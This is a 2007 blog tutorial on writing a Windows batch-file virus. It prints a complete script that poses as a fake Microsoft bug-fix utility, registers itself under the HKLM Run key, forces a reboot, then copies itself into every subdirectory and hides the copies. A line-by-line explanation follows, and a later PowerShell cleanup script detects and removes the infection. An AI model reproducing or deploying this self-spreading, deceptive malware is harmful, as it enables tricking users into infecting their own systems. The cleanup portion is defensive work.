Friday, March 30, 2007

HowTo - Create a MS Windows Batch File Virus

Before we begin writing the virus, open an instance of MS Notepad in one of the following ways, or any other way you prefer:



1. Start->Run->Type in notepad

2. Start->Accessories->Notepad





The following script, whose contents are explained in the next step of this instructable, is the virus:



@ECHO OFF
SET SD=%SYSTEMDRIVE%\
REG QUERY HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v WinDex > %SD%NULL

REM If the registry key does not exist then this is the first run of the script
IF %ERRORLEVEL% NEQ 0 (
CLS
ECHO Thank you for using Microsoft WinDex v1.0 - This program is a quick checker for any of the latest discovered bugs in the Microsoft Windows XP SP1 Operating System. Once a bug is detected, it'll append it as an entry in a list. Once the program is done executing it'll attempt to connect to microsoft.com and download the appropriate fixes. Thank you for using WinDex.
PAUSE
ECHO.
ECHO.
ECHO Initialising components, please wait....
ECHO.
ECHO.
ECHO.
REM Add the registry "WinDex" registry key and data; The REG_SZ type is used by default
REG ADD HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v WinDex /d "%SD%%~nx0"
REM If the current directory is not equal to the system drive directory, copy thyself to system directory
IF NOT "%CD%"=="%SD%" COPY /Y %0 %SD% > %SD%NULL
GOTO REBOOT
)

CLS
REM The following is the section that will be executed on next boot
ECHO WinDex will now apply the bug fixes to your system, this may take a while....
REM You can use xcopy, which would be easier and more options are offered, but I decided to do it this way
FOR /R "%CD%" %%i IN (.) DO IF NOT "%%i"=="%CD%" COPY /Y %SD%%~nx0 %%~si > %SD%NULL
FOR /R "%CD%" %%i IN (.) DO ATTRIB +h %%~si\%~nx0
CLS
GOTO END

:REBOOT
SHUTDOWN -c "Windows will now restart to apply bug fixes.... Please wait" -r -t 5
GOTO END

:END
DEL /Q %SD%NULL
EXIT





Once you've copied and pasted the above script into Notepad, save it as WinDex.BAT. The script was written so that it still functions whatever name it is given, so you can choose your own name if you prefer.



If you decide to execute this script, I suggest you REM out or simply omit the ATTRIB line that hides the copies: hidden files are harder to find, whereas unhidden copies can be located with a standard DIR command or a standard file search.



If you run it without hiding the copies, you can simply do a Windows file search and delete all the copied files, except perhaps the one you want to keep.



This step explains what the batch file virus does. We start with the first line:



@ECHO OFF



If you have ever run a batch file without this as its first line, you will have noticed that every command in the script is printed to the prompt as it executes. This line tells the batch interpreter to turn echo off so that the commands are not shown to the user; the leading @ suppresses echoing of the ECHO OFF line itself.



SET SD=%SYSTEMDRIVE%\

REG QUERY HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v WinDex > %SD%NULL



Because I use the %SYSTEMDRIVE% environment variable quite a bit in this program, I set a shorter variable with its contents (plus a trailing backslash) so I don't have to keep writing "%SYSTEMDRIVE%". The REG QUERY.... line queries the value "WinDex" under the Run key of the registry's Local Machine hive. This value does not exist on the first run of the program, so, as you'll see, I check %ERRORLEVEL% to tell whether the command succeeded; if it did not, the value is absent. The > redirects the command's output to a file named NULL in the root of the system drive so the user does not see what REG QUERY prints when the value is missing. Note that > captures only standard output; anything reg.exe writes to standard error still reaches the console (2>&1 would redirect that as well), and the redirect target is an ordinary file rather than the NUL device, which is why the script deletes it at the end.



IF %ERRORLEVEL% NEQ 0 (

CLS

ECHO Thank you for using Microsoft WinDex v1.0 - This program is a quick checker for any of the latest discovered bugs in the Microsoft Windows XP SP1 Operating System. Once a bug is detected, it'll append it as an entry in a list. Once the program is done executing it'll attempt to connect to microsoft.com and download the appropriate fixes. Thank you for using WinDex.



PAUSE



ECHO.

ECHO.

ECHO Initialising components, please wait....

ECHO.

ECHO.

ECHO.



REM Add the registry "WinDex" registry key and data; The REG_SZ type is used by default

REG ADD HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v WinDex /d "%SD%%~nx0"



REM If the current directory is not equal to the system drive directory, copy thyself to system directory

IF NOT "%CD%"=="%SD%" COPY /Y %0 %SD% > %SD%NULL

GOTO REBOOT

)



As previously mentioned, the IF tests the %ERRORLEVEL% pseudo-variable, which holds the exit code of the most recently executed command or program, here the REG QUERY. reg.exe returns 0 when the query succeeds and a non-zero code when the value does not exist, so "IF %ERRORLEVEL% NEQ 0 (..." reads: if the value stored in ERRORLEVEL is not equal to 0, execute the lines between the opening and closing parentheses.



So, on the first run, when the "WinDex" registry value does not yet exist, the script first echoes the program's header. "ECHO." prints a blank line. Since we want the program to run automatically on the next boot, the REG ADD.... command inserts a new value named "WinDex" under the Run key (the same value the REG QUERY tests for) whose data is the path the batch file will have once it sits in the root of the system drive. Writing under the HKLM Run key requires administrative rights, which the typical Windows XP user account had. As for the %0 variable: it expands to the script exactly as it was invoked, so it may be just "WinDex.BAT" when run from its own directory, or a full quoted path (i.e. "C:\Documents and Settings\....\Name_Of_Batch.BAT") when launched by double-clicking in Explorer. The %~nx0 form strips the quotes and the path and leaves only the file name and extension (%~f0 would give the full path). Because only the name is kept here, the Run value always points at the copy in the root of the system drive, regardless of where the script was first launched.



Next it compares the current directory, from the %CD% environment variable, with the system drive root; if they differ, it copies itself to the root of the system drive and redirects the output to the aforementioned NULL file. Then it jumps (GOTO) to the REBOOT section of the batch file, which simply reboots the system.



CLS

REM The following is the section that will be executed on next boot

ECHO WinDex will now apply the bug fixes to your system, this may take a while....



REM You can use xcopy, which would be easier and more options are offered, but I decided to do it this way

FOR /R "%CD%" %%i IN (.) DO IF NOT "%%i"=="%CD%" COPY /Y %SD%%~nx0 %%~si > %SD%NULL

FOR /R "%CD%" %%i IN (.) DO ATTRIB +h %%~si\%~nx0

CLS



In case you didn't know, the CLS command clears the command prompt screen. On the second run, after the system was rebooted, the REG QUERY succeeds because the "WinDex" value now exists, so the IF block is skipped and execution continues here. Before the reboot a message stated that the system needed to restart to apply the bug fixes, so we now ECHO a message saying the fixes are being applied.



The FOR loop might look intimidating, but it is really not that hard to understand. FOR /R walks every directory rooted at the current directory (the default) or at the directory given after the /R switch; here I pass "%CD%" explicitly for clarity. Each directory visited is held in the %%i variable. If we overwrote the batch file that is currently running, the script would stop executing (for a compiled executable this would not matter, since the process already runs from its own copy in memory; the check is here so that the thing can stay a batch script). So I test whether %%i equals the script's current directory and, if not, copy the root copy (%SD%%~nx0) into that directory; COPY keeps the file name when the destination is a directory. Note that FOR /R ... IN (.) yields each directory with a trailing "\." (e.g. "C:\Temp\."), so the comparison with "%CD%" never actually matches and the current directory receives a copy as well. The effect is to drop WinDex.BAT, or whatever you named it, into every writable directory below the current directory, not the whole system: only the subtree under whatever %CD% is when this run happens is walked. As usual, the output is redirected to the NULL file.

The second FOR loop walks the same tree but, instead of spreading, adds an extra touch: it hides every copied script (or exe) with ATTRIB +h so that it is not normally visible in the GUI (i.e. Windows Explorer) or in a standard DIR listing. If you are experimenting with this script, I suggest you REM out this loop, because the copies are much harder to remove once hidden.

Lastly, the %%~si syntax expands %%i, the directory currently being visited by the FOR loop, to its short (8.3) form, which avoids having to quote paths that contain spaces.
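The Run-key entry from the first run and the hidden replicas from the spreading loop are exactly what you have to undo to get rid of this thing, so here is an added PowerShell cleanup script (example code, not part of the original post) that does the author's suggested manual clean-up in one go: it reads the HKLM Run value, hashes the file it points at, finds every copy on the drive by content (hidden files included, so it still works if the ATTRIB loop was left in) and, on request, deletes the copies and the Run value. The value name "WinDex", an elevated prompt and PowerShell 4.0 or later (for Get-FileHash) are assumptions.

```powershell
# Cleanup/detection script (added example, not from the original post).
# Assumptions: the Run value is named "WinDex" as in the post (override with -ValueName),
# Windows PowerShell 4.0 or later (Get-FileHash), and an elevated prompt, since the
# entry lives under HKLM. Without -Remove the script only reports what it finds.
param(
    [string]$ValueName = 'WinDex',
    [switch]$Remove
)

$runKey = 'HKLM:\Software\Microsoft\Windows\CurrentVersion\Run'

# 1. Persistence: the batch file registers itself under the HKLM Run key on first run.
$props = Get-ItemProperty -Path $runKey -ErrorAction SilentlyContinue
if ($null -eq $props -or $null -eq $props.PSObject.Properties[$ValueName]) {
    Write-Host "No '$ValueName' value under $runKey; nothing to do."
    return
}
$target = ([string]$props.$ValueName).Trim('"')
Write-Host "Run value '$ValueName' points at: $target"

if (-not (Test-Path -LiteralPath $target -PathType Leaf)) {
    Write-Host "Target file is missing; only the dangling Run value can be removed."
    if ($Remove) { Remove-ItemProperty -Path $runKey -Name $ValueName }
    return
}

# 2. Fingerprint the root copy. Matching replicas by content rather than by name
#    matters because the post points out the script works under any file name.
$rootHash = (Get-FileHash -LiteralPath $target -Algorithm SHA256).Hash
Write-Host "SHA256 of root copy: $rootHash"

# 3. Replicas: the spreading loop drops copies into every directory below the
#    directory it ran from and marks them hidden, so walk the whole drive with
#    -Force (includes hidden files). Only .bat/.cmd files are hashed to keep it cheap.
$drive  = [System.IO.Path]::GetPathRoot($target)
$copies = @(Get-ChildItem -Path $drive -Recurse -Force -File -Include '*.bat','*.cmd' -ErrorAction SilentlyContinue |
    Where-Object { (Get-FileHash -LiteralPath $_.FullName -Algorithm SHA256).Hash -eq $rootHash })

Write-Host ("{0} file(s) match the root copy:" -f $copies.Count)
foreach ($f in $copies) {
    Write-Host ("  {0}  [{1}]" -f $f.FullName, $f.Attributes)
}

# 4. Removal: delete the copies (-Force is needed for hidden files) and the Run value,
#    so the script neither survives on disk nor respawns on the next boot.
if ($Remove) {
    foreach ($f in $copies) {
        Remove-Item -LiteralPath $f.FullName -Force
    }
    Remove-ItemProperty -Path $runKey -Name $ValueName
    Write-Host ("Removed {0} file(s) and the '{1}' Run value." -f $copies.Count, $ValueName)
}
```

Run it once without -Remove from an elevated prompt to review the list, then with -Remove to delete. The copy you originally launched is matched as well, since it hashes the same as the root copy; the order (files first, Run value last) means a reboot in the middle cannot leave a working entry behind.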



GOTO END



:REBOOT

SHUTDOWN -c "Windows will now restart to apply new fixes.... Please wait" -r -t 5

GOTO END



:END

DEL /Q %SD%NULL

EXIT



The GOTO END here jumps to the END label, which quietly (/Q) deletes the NULL file and then exits the script, closing the prompt window. Next comes the REBOOT label (:REBOOT), which reboots and then also goes to END. In the SHUTDOWN line, -r restarts the machine, -t 5 gives a 5-second countdown, and -c supplies the message shown in the shutdown dialog box along with the countdown.



The END label (:END), as mentioned previously, quietly deletes the NULL file we have been using as a redirect target and then exits.



Well that concludes this instructable. Cheers!


